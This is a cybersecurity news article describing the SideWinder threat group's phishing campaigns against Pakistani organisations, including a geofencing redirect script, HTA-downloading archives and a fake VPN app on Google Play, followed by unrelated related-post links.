SideWinder hackers target Pakistani entities using fake Android VPN apps

Share This Post

SideWinder, also tracked under the monikers Hardcore Nationalist, Rattlesnake, Razor Tiger, and T-APT-04, has been active since at least 2012 with a primary focus on Pakistan and other Central Asian countries like Afghanistan, Bangladesh, Nepal, Singapore, and Sri Lanka. Last month, Kaspersky attributed to this group over 1,000 cyber attacks that took place in the past two years, while calling out its persistence and sophisticated obfuscation techniques.

SideWinder, a threat actor notorious for phishing assaults targeting Pakistani public and private sector organisations, has added a new unique tool to its malware arsenal. “The gang’s principal attack vectors are phishing URLs in emails or postings that resemble genuine announcements and services of government agencies and organisations in Pakistan,” Group-IB, a Singapore-based cybersecurity firm, stated in a Wednesday report.

Highlights

  • The custom tool identified by Group-IB, dubbed SideWinder.AntiBot.Script, acts as a traffic direction system diverting Pakistani users clicking on the phishing links to rogue domains. Should a user, whose client’s IP address differs from Pakistan’s, click on the link, the AntiBot script redirects to an authentic document located on a legitimate server, indicating an attempt to geofence its targets. “The script checks the client browser environment and, based on several parameters, decides whether to issue a malicious file or redirect to a legitimate resource,” the researchers said.

  • The threat actor’s modus operandi involves the use of spear-phishing emails to distribute malicious ZIP archives containing RTF or LNK files, which download an HTML Application (HTA) payload from a remote server. This is achieved by embedding fraudulent links that are designed to mimic legitimate notifications and services of government agencies and organizations in Pakistan, with the group also setting up lookalike websites posing as government portals to harvest user credentials.

In January 2020, Trend Micro detailed three malicious apps that were disguised as photography and file manager tools that leveraged a security flaw in Android (CVE-2019-2215) to gain root privileges as well as abuse accessibility service permissions to harvest sensitive information. Found this article interesting? Follow THN on Facebook, Twitter  and LinkedIn to read more exclusive content we post.

Of special mention is a phishing link that downloads a VPN application called Secure VPN (“com.securedata.vpn”) from the official Google Play store in an attempt to impersonate the legitimate Secure VPN app (“com.securevpn.securevpn”). While the exact purpose of the fake VPN app remains unclear, this is not the first time SideWinder has sneaked past Google Play Store protections to publish rogue apps under the pretext of utility software.

spot_img

Related Posts

For iOS 16 and macOS Ventura, Safari will support AVIF

It took ten years for Safari to support WebP,...

iPhone 14 parts are now being shipped from Apple providers

Trying to Get Ahead of Possible Supply Chain Constraints....

Now that CarPlay is out, you can use it on your Tesla with just two Raspberry Pi’s

Tesla Android Project in action – driving around with...

Service packages could be where Apple TV + finds its purpose

“Apple TV+ will likely never be material financially for...

A Google Maps competitor announces a significant update to its own iPhone and android navigation app

Earlier this month, the company updated its mobile applications...